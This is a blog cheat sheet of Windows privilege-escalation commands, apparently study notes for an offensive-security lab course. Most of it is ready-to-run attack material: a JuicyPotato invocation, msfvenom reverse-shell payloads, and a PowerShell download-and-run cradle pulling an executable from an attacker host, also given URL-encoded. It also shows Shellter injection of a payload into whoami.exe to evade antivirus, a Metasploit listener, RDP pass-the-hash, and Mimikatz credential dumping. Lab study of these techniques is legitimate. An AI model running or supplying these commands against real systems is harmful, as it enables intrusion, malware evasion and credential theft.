Maojui

攻擊伺服器 (五) | 提權相關 - Windows

2022-08-05

Juicy Potato (abusing the golden privileges)

Process creation mode depending on the impersonated user’s privileges you can choose from:

  • CreateProcessWithToken (needs SeImpersonate)
  • CreateProcessAsUser (needs SeAssignPrimaryToken)
  • both

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM

https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

CLSID

Windows CLSID

JuicyPotato

1
juicypotato-x86.exe -t * -p C:\inetpub\wwwroot\shell.exe -l 1338  -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}"

Rough Potato

https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html

FTP

  • Cannot execute in DOS Mode.

    1
    ftp> binary

Reverse shell

  • msfvenom

    1
    2
    3
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
    msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f exe > mao.exe

Download by powershell

1
2
3
4
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.126:9999/mao.exe', 'c:\Users\Public\mao.exe')

#URL-ENCODE
powershell.exe%20%28New-Object%20System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2F192.168.119.126%3A9999%2Fmao.exe%27%2C%20%27c%3A%5CUsers%5CPublic%5Cmao.exe%27%29

Default port: 3389

1
2
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
  • With credentials
1
2
3
4
rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>

Windows script

msfvenom Reverse 腳本

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw > reverse_shell.bin

  • shellter :把腳本寫進 PE 檔,躲防毒 (80 port)

    1
    sudo shelter
    • reverse_shell.bin 塞進 whoami.exe
    1
    cp /usr/share/windows-resources/binaries/whoami.exe .
    • 有地方能寫,就貼近去(O

  • 撿 Reverse shell

1
2
3
4
5
sudo msfconsole -q -x "use exploit/multi/handler;\
	set PAYLOAD windows/meterpreter/reverse_tcp;\
	set LHOST 192.168.119.126;\
	set LPORT 8888;\
	run"
  • 把 poultryadmin 的密碼改成 OffSecHax1!
1
net user <user_name> <password>

Mimikatz

  • show password

    1
    vault::cred

  • Dump credential

    1
    2
    3
    sekurlsa::msv
    sekurlsa::logonPasswords
    lsadump::sam

  • Check privilege

    1
    privilege::debug

Privesc check

Tags: 實用小 code 駭客 Windows 提權
攻擊伺服器 (四) | 蒐集受害者資料 攻擊伺服器 (五) | 提權 - Linux